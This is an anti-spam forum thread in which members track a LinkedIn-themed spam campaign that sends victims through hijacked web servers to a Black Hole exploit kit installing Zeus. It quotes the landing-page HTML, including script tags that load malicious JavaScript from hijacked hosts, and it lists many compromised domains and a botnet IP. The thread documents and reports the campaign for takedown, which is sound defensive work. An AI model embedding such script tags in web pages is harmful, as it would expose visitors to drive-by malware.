Numerous malware drive by attempts

spamislame · **Joined:** Tue May 09, 2006 9:18 am **Posts:** 5022

In the past three weeks I've seen a sudden rush of all manner of fake notification pushing urls of hijacked servers which attempt to perform several types of malware exploitations.

The messages are always the same kind of format:

- Fake notification from a company. Lately it's been mostly Linkedin notices (some fake person needing a recommendation, etc.)
- Several links each claiming to be for a different thing (Read more, contact us, unsubscribe)
- Each link is a distinct hijacked server.

The hijacked servers always have a randomly named subdirectory and an index file, e.g.:

Code:

http://acte-firma-offshore.ro/Nfy7BLd8/index.html

When you go to one of the hijacked server links, you see a message that says "WAIT PLEASELoading...".

If you view source on these individual pages, you see a string of *other* hijacked servers are supplying the malicious JavaScript code:

Code:

<html>
<h1>WAIT PLEASE</h1>
 <h3>Loading...</h3>
 <script type="text/javascript" src="http://mrsmakeit.com/9jrgDjED/js.js"></script>
<script type="text/javascript" src="http://myparacord.com/cxW8X8xp/js.js"></script>
<script type="text/javascript" src="http://thebestguide1.com/arKwG4pE/js.js"></script>
<script type="text/javascript" src="http://www.extrhema.com.br/cVspcegd/js.js"></script>
<script type="text/javascript" src="http://www.industriacaxiense.com.br/HLAeMSAd/js.js"></script>

</html>

Again: randomly named directory and a js file.

So there's an automated process out there that's doing this to (so far) dozens of unsecured, abandoned, long forgotten websites.

So far this week I have reported 53 servers, covering the whole gamut of the hijacked servers. Many of these are completely abandoned or hosted by really obscure, what I refer to as "unmanned" ISP's. No contact address works for some of them, or the ones that do go unanswered. I'd say I'm at about a 40% success rate for getting this suspended or secured.

I've created a really basic tool called the Phishing ReporterAtor™ which certainly makes life easier, but there's got to be some better way of notifying these ISP's and hosting companies that criminals have pwned a large number of their servers.

Having said all of this: none of these messages make it past any spam filter at all, via numerous email providers. (Gmail, Yahoo, etc.) So I have to question the overall success of this malware campaign.

Mostly fyi for now but this is becoming an epidemic.

SiL

NotBuyingIt · **Joined:** Sun Jun 13, 2010 5:22 pm **Posts:** 528

"this is becoming an epidemic"

I attempted to describe some of the malware campaign here:
http://www.mywot.com/en/forum/21464-qai ... -2010-1885

The patterns of the malicious URLs (deceptive landing page, intermediate JavaScript, malware payload) have been easy to spot so far.

Red Dwarf · **Joined:** Tue Jun 27, 2006 2:01 am **Posts:** 9227

From just the last 2 days, here is a list of 151 hijacked hosts found in spam. Each has an 8 random character string in the URL. They are sequenced by most frequent (127 hits) to least frequent (1 hit)

Code:

futurisima.com.ar
iips.edu.in
industriadaformatura.com.br
grimper.awardspace.com
gri.or.id
escoladailha.com.br
gardenmoveis.com.br
odontofamily.com.br
gerindra.or.id
giftformom.trei.ro
ttest.co.za
oscardelaolla.com.co
tubogas.com.br
peridot.com.vn
ogrodzeniamirko.home.pl
whiteoak.co.za
tatuielegante.com.br
sillinho.bplaced.net
www.andif.com.br
www.damhofer.com
planetafitnessltda.com.br
manczyl.webd.pl
spyder.snowpeak.com.tw
positivacomunicacao.com.br
newsletter.lavorosalute.it
test1991.mebyre.com
nafti.edu.gh
testeaza.trei.ro
lirahost.com.br
twilightbefore.bplaced.net
maxtone.nazwa.pl
www.dentalimplants123.com
seniordatinggroup.co.uk
corporateuniversity.com.br
mirrorfelder.cnh.at
sbemrj.org.br
cpm.borec.cz
istorie.usm.md
revistatempo.com.br
radicalatm.com.ar
intecone.com.br
www.elisaviscontinetwork.com
aluguechacaras.com.br
ayvitour.com.ua
chusto.lviv.ua
scsuprema.com.br
www.eventakustik.de
www.eurowire.it
aashirwad.com.hk
www.fitratder.org
mail2.direct.ee
balihai1.tempsite.ws
wp10647654.wp274.webpack.hosteurope.de
visualdesenvolvimento.com.br
ufmi.com.my
rlinux.moderna.com.br
rajniti.co.in
videos.newmotion.at
thebeautiq.com.au
suitesdojo.com.br
sospiscinaspr.com.br
romero12.mserwis.pl
revistalabarra.com.co
laseresp.com.mx
s373104026.online.de
municipioderawson.gob.ar
rmraguapura.com.br
afrohealing.co.za
smileshop.com.au
praxedysadesivos.com.br
hassansaeed.99k.org
ocgcoaching.co.il
rygy.com.br
micmusz.webd.pl
lulu.com.co
www.izaz.com.br
www.hoegie.be
marcusxl.blink.pl
z8mm.com.br
gfpesquisas.com.br
www.kadinmuhendisler.org
redleafapartments.co.in
saofranciscodocorumbau.com.br
oguzhanguzel.av.tr
nackageinvestmentgroup.com.au
newsite.itsgroup.it
www.barcuta.ro
www.artdelivery.it
witer.home.pl
v1.globaltransit.net
promocaolilicaetigor.com.br
portal365.freehosting.com
wproduct.99k.org
ssttice.bplaced.net
www.autoreinigung.at
tiborita.altervista.org
support.imatone.fr
scarletcourier.50webs.com
pm.weexcel.in
personnalis.com.br
prakash.clanteam.com
lawsystem.com.br
zegluga.lh.pl
www.cityofsutton.org
travian1000x.zzl.org
quickphoto.com.br
ftp.zimmerrestaurante.com.br
ftp.vilasek.com
www.ismailgunes.web.tr
www.gastrocomplexeu.pl
www.bizsizanayasaolmaz.org
wordpressitalia.altervista.org
vivaleboutique.com.br
ucscad.com.br
snowpeak.com.tw
monochromatic.art.pl
imobiliariacruzeirors.com.br
www.wahbischool.com
www.kemerburgazfutbolokulu.com
www.gruppoenter.eu
www.dimac.com.ar
www.cbac.com
voip.valorizaweb.com.br
vinicolaperini.com.br
travian250x.zzl.org
travelodubai.co.uk
topkids.com.br
tony.web.id
styling.krakow.pl
ssios.com.pk
snakeprotex.com.au
siwy010.webd.pl
shop.madamegrillet.it
seicommat.hospedagemdesites.ws
s391025613.onlinehome.fr
recantopaulista.com.br
radioresgateonline.com.br
pzas.nazwa.pl
proweb1.bplaced.net
piratrilhas.com.br
patentmall.com.my
pasandola.nixiweb.com
osteologia.org.ar
nortonmini.com.ar
metropolis.com.br
mcms.xs2theworld.com
mariotta.com.br
loja.weissblumenn.com.br
ftp.dariocandela.altervista.org
eminenceorganics.com.my
curicica.com.br

SIL, let me now if you need the full URLs for reporting.

spamislame · **Joined:** Tue May 09, 2006 9:18 am **Posts:** 5022

Red Dwarf wrote:

SIL, let me now if you need the full URLs for reporting.

Yes please!

SiL

spamislame · **Joined:** Tue May 09, 2006 9:18 am **Posts:** 5022

Gar Warner, as it turns out, just posted about this:

http://garwarner.blogspot.ca/2012/03/ze ... hreat.html

It's Zeus, again (of course.)

SiL

AlphaCentauri · **Joined:** Thu Mar 01, 2007 3:01 am **Posts:** 5915

As lame as these appear when they're from the wrong bank, I'm sure they hit lots of people who do use the bank being spoofed, and maybe even a few who share access to an account with the sort of person who needs to do a lot of password resets.

Red Dwarf · **Joined:** Tue Jun 27, 2006 2:01 am **Posts:** 9227

spamislame wrote:

Red Dwarf wrote:

SIL, let me now if you need the full URLs for reporting.

Yes please!

SiL

1,500 URLs from the past 3 days sent.
:silthumb:

< = silthumb!

Red Dwarf · **Joined:** Tue Jun 27, 2006 2:01 am **Posts:** 9227

spamislame wrote:

Gar Warner, as it turns out, just posted about this:

http://garwarner.blogspot.ca/2012/03/ze ... hreat.html

It's Zeus, again (of course.)

SiL

garwarner wrote:

In the very most recent of these "BlackHole to Zeus" malware campaigns, LinkedIn is being imitated. The LinkedIn invitation claims to be from "Your classmate", but guess what happens if you click one of the 820 advertised URLs, each disguised as your "friend's" name?

Yes, it loads several redirectors, and then sends them to a Black Hole Exploit kit that infects the visitor with Zeus!

The format matches exactly, a hacked web server, a random 8-character string, index.html (techie grep pattern "/......../index.html")

garwarner wrote:

promocaolilicaetigor.com.br / VJBqqR5H / index.html

BTW, in that particular example - The requested URL /VJBqqR5H was not found on this server.

Red Dwarf · **Joined:** Tue Jun 27, 2006 2:01 am **Posts:** 9227

Here are some of the js.js second level URLs. The usual warnings apply - do not load these

Code:

<script type="text/javascript" src="http://boemelparty.be/vnB4GozT/js.js"></script>
<script type="text/javascript" src="http://bscert.eu/CAgADsB0/js.js"></script>
<script type="text/javascript" src="http://chroniquesradios.com/7KnKEoKm/js.js"></script>
<script type="text/javascript" src="http://nhb.prosixsoftron.in/cJHrkMSb/js.js"></script>
<script type="text/javascript" src="http://sas.hg.pl/Th5Da66c/js.js"></script>
<script type="text/javascript" src="http://www.alpine-turkey.com/YfTXsaR5/js.js"></script>
<script type="text/javascript" src="http://www.frogeen.com/hPPP5CqE/js.js"></script>
<script type="text/javascript" src="http://www.thedugoutdawgs.com/H5WkxY8X/js.js"></script>
<script type="text/javascript" src="http://www.vinhthanh.com.vn/8cACpVEr/js.js"></script>

The domains / web servers are

Quote:

boemelparty.be
bscert.eu
chroniquesradios.com
nhb.prosixsoftron.in
sas.hg.pl
hXXp://www.alpine-turkey.com
hXXp://www.frogeen.com
hXXp://www.thedugoutdawgs.com
hXXp://www.vinhthanh.com.vn

[EDIT] More added

spamislame · **Joined:** Tue May 09, 2006 9:18 am **Posts:** 5022

I reported around 50 of these so far (both the js.js hosts and the /#########/index.html hosts)

SiL

NotBuyingIt · **Joined:** Sun Jun 13, 2010 5:22 pm **Posts:** 528

I am uncertain, but it seems to me that somebody is doing web development on one of these Zeus black hole exploits at the moment (or just before I posted this) at

hXXp://50.116.50.82/showthread.php?t=d7ad916d1c0396ff

spamislame · **Joined:** Tue May 09, 2006 9:18 am **Posts:** 5022

NotBuyingIt wrote:

I am uncertain, but it seems to me that somebody is doing web development on one of these Zeus black hole exploits at the moment

...

Or rather: was. :twisted:

SiL

NotBuyingIt · **Joined:** Sun Jun 13, 2010 5:22 pm **Posts:** 528

spamislame wrote:

Or rather: was. :twisted:

Ah! The botnet domain clearschooner.com (Creation Date: 28-mar-2012) has been suspended; its registrar MONIKER ONLINE SERVICES, INC has set its status to clientHold. Its DNS (monikerdns.net) continues to associate it with IP 50.116.50.82 on the Linode Network in the USA; however the server at that IP address appears to have gone offline. :silthumb:

It may be productive to examine any similarly named domains which were created near the same time as clearschooner.com

NotBuyingIt · **Joined:** Sun Jun 13, 2010 5:22 pm **Posts:** 528

I believe that the following article refers to some of these drive-by attempts

http://garwarner.blogspot.com/2012/03/u ... lware.html

Canadian translation:

http://garwarner.blogspot.ca/2012/03/us ... lware.html

(Note: The blog will not render properly on an iPad.)

NotBuyingIt · **Joined:** Sun Jun 13, 2010 5:22 pm **Posts:** 528

These deceptive URLs (presumably found in spam that, I am guessing, are spoofs of PayPal in this case)

all link to web pages that are coded to load several of these "intermediate" JavaScript files at at time

The intermediate scripts redirect to a malicious website such as

The intermediate JavaScript files seem to be revised from time to time to alter the redirection target. Perhaps the repeated revisions of the JavaScript files is a technique that has replaced the fast-flux ploy of manipulating DNS which Zeus botnets had been using.

[Edit: Add] Today, Dmitry Tarakanov of Kaspersky Lab Poland is using the term polymorphism to generally characterize the frequent code changes in the current set of Zeus malware campaigns.
See http://www.viruslist.pl/weblog.html?weblogid=785

InBoxRevenge KS Forum

Numerous malware drive by attempts

Who is online